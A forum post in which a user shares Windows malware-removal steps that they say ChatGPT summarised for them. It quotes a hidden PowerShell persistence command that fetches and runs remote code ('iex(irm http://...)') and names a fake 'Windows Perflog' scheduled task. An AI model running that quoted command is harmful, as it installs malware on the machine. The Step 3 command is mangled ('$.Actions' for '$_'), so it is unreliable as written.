![](data:image/svg+xml, %3Csvg xmlns='http://www.w3.org/2000/svg' height='64' class='font-weight-bold' style='font: 600 30.11764705882353px "SegoeUI", Arial' width='64'%3E%3Ccircle fill='hsl(236.8, 57.00000000000001%, 32%)' cx='32' cy='32' r='32' /%3E%3Ctext x='50%25' y='55%25' dominant-baseline='middle' text-anchor='middle' fill='%23FFF' %3EKT%3C/text%3E%3C/svg%3E)
while searching for a solution chat gpt make me did something. it seems work for me. ı do not know much about computers so ı asked chat gpt to summarize steps that we have done and below its answer( I AM NOT AWARE OF WHAT DİD THE CODES BELOW DOES AND DO NOT CLEARLY SUGGEST TO FOLLOW THESE STEPS WİTHOUT CHECK BY YOURSELF, However it works for me.)
STEP 1 – Check the Registry Run key
Open PowerShell as Administrator and run:
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
If you see something similar to this:
Windows PowerShell v1.0 powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex(irm http://...)"
this is malicious.
Remove it with:
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows PowerShell v1.0" /f
However, removing the registry key alone usually does NOT fix the issue.
STEP 2 – Find what is launching PowerShell (important)
Run this command:
Get-CimInstance Win32_Process | Where-Object {$_.Name -like "powershell*"} | Select Name,ProcessId,ParentProcessId,CommandLine
If the parent process looks like:
svchost.exe -k netsvcs -s Schedule
then PowerShell is being started by the Windows Task Scheduler.
STEP 3 – Find the malicious scheduled task
Run:
Get-ScheduledTask | ForEach-Object { foreach ($a in $.Actions) { "$($.TaskPath)$($_.TaskName) | $($a.Execute) $($a.Arguments)" } }
Look for tasks that launch PowerShell with arguments like:
ExecutionPolicy Bypass WindowStyle Hidden iex(irm http://...)
In my case the malicious task was:
Windows Perflog
which executed:
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex(irm http://.../task)"
This task name tries to look like a Windows system task but it is not legitimate.
Delete it using:
Unregister-ScheduledTask -TaskName "Windows Perflog" -Confirm:$false
STEP 4 – Check WMI persistence
Some malware uses WMI event subscriptions.
Run:
Get-WmiObject -Namespace root\subscription -Class __EventFilter Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer
If any entry launches PowerShell or contains URLs, it is suspicious.
STEP 5 – Check Startup folders
Check these folders:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Look for scripts such as:
.ps1 .vbs .bat
STEP 6 – Final check
Verify running PowerShell processes:
Get-CimInstance Win32_Process | Where-Object {$_.Name -like "powershell*"} | Select Name,CommandLine
Only the PowerShell instance you opened manually should appear.